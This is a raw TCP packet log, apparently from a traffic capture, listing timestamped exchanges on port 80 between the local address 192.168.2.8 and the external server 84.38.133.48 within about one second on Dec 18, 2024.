Dec 18, 2024 11:08:09.791404009 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.791517973 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.799654007 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.799741983 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.799994946 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.846896887 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.846961975 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.847047091 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.847047091 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.850744009 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.850841045 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.850858927 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.850950956 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.858407021 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.858516932 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.858529091 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.858620882 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.866147995 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.866213083 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.866250038 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.866301060 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.873722076 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.873780012 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.873801947 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.873864889 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.881254911 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.881403923 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.881459951 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.881459951 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.888951063 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.889054060 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.961273909 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.961390972 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.961436033 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.961509943 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.965162039 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.965254068 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.965722084 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.965764046 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.972816944 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.972892046 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.975622892 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.975728989 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.975754023 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.975822926 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.983205080 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.983285904 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.983339071 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.983500004 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.990885973 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.990982056 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.991127968 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.998342037 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.998446941 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:09.998502970 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:09.998539925 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.005023956 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.005103111 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.005141973 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.005358934 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.011420012 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.011487007 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.011507988 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.011563063 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.017323971 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.017381907 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.017426014 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.017482042 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.022979975 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.023077011 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.039253950 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.039330959 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.039344072 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.039390087 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.042078972 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.042150974 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.042193890 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.042273045 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.047698021 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.047864914 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.047869921 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.047919035 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.053335905 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.053420067 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.053512096 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.053608894 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.058980942 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.059096098 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.059112072 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.059171915 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.064626932 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.064708948 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.064749956 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.065701962 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.070319891 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.070378065 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.070406914 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.070425034 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.075958967 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.076041937 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.076076984 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.076131105 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.081523895 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.081659079 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.081661940 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.081729889 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.087178946 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.087306976 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.087362051 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.087434053 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.092796087 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.092926979 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.092979908 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.092979908 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.098453999 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.098560095 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.098603010 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.098723888 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.152420998 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.152522087 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.152678013 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.154556036 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.154762983 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.154835939 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.154881001 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.155173063 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.159471989 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.159605026 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.159615040 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.159718990 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.164185047 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.164344072 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.164372921 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.164649963 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.168970108 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.169110060 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.169190884 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.169447899 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.173629999 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.173763990 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.173780918 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.173887014 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.178024054 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.178142071 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.178194046 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.178194046 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.182281017 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.182358980 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.182394981 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.182543993 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.186400890 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.186568022 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.186599016 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.186656952 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.190470934 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.190629005 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.190638065 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.190824986 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.194524050 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.194622993 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.194636106 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.194681883 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.198353052 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.198443890 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.198458910 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.198508024 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.202069044 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.202183008 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.202203035 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.202306986 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.205811024 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.205919027 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.205996990 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.205996990 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.209563971 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.209587097 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.209621906 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.210150003 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.230350971 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.230424881 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.230468035 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.230468035 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.231564999 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.231611013 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.231729031 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.233720064 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.233773947 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.234581947 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.234661102 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.234667063 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.234795094 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.236872911 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.236948013 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.236984015 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.237046957 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.239396095 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.239442110 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.239476919 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.239521980 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.241501093 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.241615057 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.241636992 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.241704941 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.243787050 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.244019032 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.244039059 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.244112968 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.246088982 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.246198893 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.246248007 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.246248007 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.248398066 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.248450994 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.248469114 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.248545885 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.250829935 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.250940084 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.250993013 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.250993013 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.253047943 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.253102064 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.253106117 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.253153086 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.272279024 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.272341013 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.272363901 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.272442102 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.343672037 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.343738079 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.343759060 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.343854904 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.344691992 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.344750881 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.344763994 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.344829082 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.347006083 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.347067118 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.347127914 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.347203970 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.349351883 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.349420071 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.349441051 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.349534988 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.351578951 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.351656914 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.351710081 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.351804018 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.353945017 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.354018927 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.354042053 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.354187965 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.356268883 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.356328011 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.356342077 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.356410980 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.358510017 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.358565092 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.358691931 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.358751059 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.360826969 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.360938072 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.360956907 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.361033916 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.363125086 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.363185883 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.363250971 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.363329887 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.365469933 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.365537882 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.365576982 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.365645885 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.367885113 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.367944002 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.367944956 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.368015051 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.370081902 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.370160103 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.370193005 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.370246887 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.372386932 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.372445107 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.372495890 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.372495890 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.374516010 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.374555111 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.374600887 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.374600887 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.376826048 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.376944065 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.376966953 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.376983881 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.378747940 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.378843069 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.378858089 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.378906012 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.380755901 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.380853891 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.380903006 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.380903006 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.382843971 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.382899046 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.382908106 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.382970095 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.384880066 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.384970903 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.384978056 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.385054111 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.386864901 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.386970043 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.387017012 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.387100935 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.388936996 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.389079094 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.389125109 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.389125109 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.390954971 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.391088963 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.391139984 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.391139984 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.393043995 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.393096924 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.393146992 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.393146992 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.395051003 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.395134926 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.395169973 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.395232916 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.397108078 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.397219896 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.397265911 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.397265911 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.398778915 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.398813963 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.398849964 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.398849964 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.400219917 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.400335073 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.400336027 CET	80	49711	84.38.133.48	192.168.2.8
Dec 18, 2024 11:08:10.400613070 CET	49711	80	192.168.2.8	84.38.133.48
Dec 18, 2024 11:08:10.421375036 CET	80	49711	84.38.133.48	192.168.2.8
